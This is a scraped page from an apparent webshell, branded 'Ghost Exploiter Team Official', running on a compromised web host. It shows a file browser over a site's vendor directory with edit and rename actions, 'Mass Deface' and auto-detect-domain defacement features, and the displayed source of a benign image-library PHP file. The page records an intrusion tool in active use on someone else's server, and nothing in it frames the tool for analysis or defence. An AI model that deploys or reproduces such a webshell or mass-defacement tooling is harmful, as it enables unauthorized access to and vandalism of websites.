webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
intervention
/
image
/
src
/
Intervention
/
Image
/
Imagick
/
Commands
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BackupCommand.php
0.54KB
edt
ren
BlurCommand.php
0.457KB
edt
ren
BrightnessCommand.php
0.472KB
edt
ren
ColorizeCommand.php
1.307KB
edt
ren
ContrastCommand.php
0.482KB
edt
ren
CropCommand.php
1.329KB
edt
ren
DestroyCommand.php
0.546KB
edt
ren
ExifCommand.php
1.492KB
edt
ren
FillCommand.php
3.31KB
edt
ren
FitCommand.php
1.212KB
edt
ren
FlipCommand.php
0.613KB
edt
ren
GammaCommand.php
0.462KB
edt
ren
GetSizeCommand.php
0.575KB
edt
ren
GreyscaleCommand.php
0.397KB
edt
ren
HeightenCommand.php
0.787KB
edt
ren
InsertCommand.php
1.038KB
edt
ren
InterlaceCommand.php
0.603KB
edt
ren
InvertCommand.php
0.374KB
edt
ren
LimitColorsCommand.php
1.751KB
edt
ren
MaskCommand.php
1.893KB
edt
ren
OpacityCommand.php
0.599KB
edt
ren
PickColorCommand.php
0.779KB
edt
ren
PixelCommand.php
0.8KB
edt
ren
PixelateCommand.php
0.655KB
edt
ren
ResetCommand.php
0.897KB
edt
ren
ResizeCanvasCommand.php
3.099KB
edt
ren
ResizeCommand.php
0.703KB
edt
ren
RotateCommand.php
0.753KB
edt
ren
SharpenCommand.php
0.45KB
edt
ren
TrimCommand.php
3.583KB
edt
ren
WidenCommand.php
0.781KB
edt
ren
<?php namespace Intervention\Image\Imagick\Commands; class WidenCommand extends ResizeCommand { /** * Resize image proportionally to given width * * @param \Intervention\Image\Image $image * @return boolean */ public function execute($image) { $width = $this->argument(0)->type('digit')->required()->value(); $additionalConstraints = $this->argument(1)->type('closure')->value(); $this->arguments[0] = $width; $this->arguments[1] = null; $this->arguments[2] = function ($constraint) use ($additionalConstraints) { $constraint->aspectRatio(); if(is_callable($additionalConstraints)) $additionalConstraints($constraint); }; return parent::execute($image); } }
<=Back
Liking